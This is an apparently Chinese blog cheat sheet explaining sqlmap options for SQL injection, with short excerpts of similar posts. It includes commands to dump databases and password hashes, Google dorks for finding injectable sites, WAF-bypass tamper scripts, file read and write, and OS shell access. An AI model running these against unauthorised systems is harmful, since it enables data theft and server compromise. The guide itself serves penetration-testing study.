我的SQLmap使用方法(詳解)

2021-10-06 01:51:36 字數 3425 閱讀 6348

sqlmap安裝

基本引數

-h 檢視幫助選項

--is-dba 當前使用者是否為管理員許可權

--dbs 所有資料庫

--current-db **當前資料庫

--users 所有資料庫使用者

--current-user 當前資料庫使用者

--tables 引數:列表名

--columns 引數:列欄位

--dump-all 轉存dbms資料庫所有表專案

--level 測試等級(1-5),預設為1

讀取資料庫--->讀取表---->讀取表的列---->獲取內容

-d 指定資料庫

-t 指定表

-c 指定列

--dbms=mysql、oracle、mssql 指定資料庫

--passwords 列舉所有使用者密碼

--roles 列出資料庫管理員角色(當前資料庫許可權)

--privileges 列出資料庫管理員許可權

sqlmap.py -u ""  --schema  --batch  --exclude-sysdbs

--schema 列系統框架(很漫長,慎用!)

--batch 預設yes

--exclude-sysdbs 排除系統自帶的資料庫

- -level 探測等級

–risk 風險等級

-u或者-url 獲取目標引數

-m 從文字中獲取多個目標掃瞄

www.target1.com/vuln1.php?q=foobar

……

執行如下,命令sqlmap會逐個檢測url

sqlmap.py  -m  c:\a.txt
-r 獲取http請求注入

-g 處理google搜尋結果

python sqlmap.py -g "inurl:php?id="
–referer,–headers,–proxy,
sqlmap.py -u "" --referer=""
sqlmap.py -u "" --hearders 「client-ip:1.1.1.1」
sqlmap.py -u ""   --proxy  ""
–delay、–timeout、–retries時間控制(降低爬行速度,過狗。或修改sqlmap的爬行蜘蛛)

–safe-url,–safe-freq

-p 手動指定要測試的位置

sqlmap.py -r d:\1.txt  -p uname,passwd
–data 此引數是把資料以post方式提交,sqlmap會像檢測get引數一樣檢測post的引數。
python sqlmap.py -r d:\1.txt --data="id=1"
–param-del 引數拆分字元
python sqlmap.py -u "" --data="query=foobar;id=1" --param-del=";"
–cookie 適用於cookie注入

將參加加入cookie注入測試,例如:

sqlmap -u "" --cookie "id=9" --table --level 2
–prefix,–suffix【閉合前面—prefix="』)「閉合後面—suffix=」』)"】
$query = "select * from users where id=(』" . $_get[』id』] . "』) limit 0, 1";
sqlmap.py -u "" -p id --prefix "』)" --suffix "and(』abc』=』abc"
–union-cols

–union-char

–second-order

–dump-all,–exclude-sysdbs

–search,-c,-t,-d

–udf-inject,–shared-lib

–batch

–charset

–flush-session

–hex

sqlmap.py -u "" --banner --hex -v 3 --parse-errors
-s,-t

–output-dir

–parse-errors 從響應中獲取dbms的錯誤資訊。

–smart

python sqlmap.py -u "" --batch --smart
–mobile
sqlmap.py -u "" --mobile
–identify-waf,–check-waf
sqlmap.py -u   --identify-waf  -v 3
登錄檔操作(慎用!!!操作不當,系統易崩潰。)
python sqlmap.py -u  --reg-add --reg-key="hkey_local_machine\software\sqlmap" --reg-value=test --reg-type=reg_sz --reg-data=1
–common-tables 暴力破解表名

–common-columns 暴力破解列名

post登入框注入

搜尋框注入

偽靜態注入

sqlmap -u  #其中*意為指定的注入點
base64編碼注入
sqlmap -u  --tamper base64encode.py –dbs
請求時間延遲

檔案讀寫

sqlmap.py -u "" --file-read="c:/inetpub/wwwroot/mysql-php/1.php"
–file-write,–file-dest檔案上傳(可上傳一句話)

–os-cmd,–os-shell命令執行

–dump

waf繞過注入

sqlmap -u  -v 3 --dbs  --batch --tamper "space2morehash.py"

還有:space2hash.py

base64encode.py

charencode.py

sqlmap -u "" --os-pwn --msf-th /usr/share/metasploit-framework/

Sqlmap 使用方法小結

平常的使用get方法像 tables columns t d dbs dump 啥的就不說了,只是部落格幾天不發,空著不好,還是得寫寫東西 is dba 當前使用者許可權 是否為root許可權,mssql下最高許可權為sa dbs 所有資料庫 current db 當前資料庫 users 所有資料庫...

sqlmap基本使用方法

sqlmap是安全測試工具,通常用於對已知的http介面進行sql注入測試,一旦注入成功,可以獲取到後台包括資料庫表 使用者資訊 資料內容等多種敏感資訊,對web漏洞防範有重要意義。基本語法 1.先進行注入點探測,常規語法是 python sqlmap.py u url 說明 url 一般選擇包括引...

sqlmap的簡要使用方法

僅作為備忘!sqlmap使用 注入型別有四種分別為 boolean based blind error based stacked queries inline query。sqlmap u u 注入點 檢測注入點是否可用 sqlmap u dbs 可曝出該sqlserver中所有資料庫名稱 sql...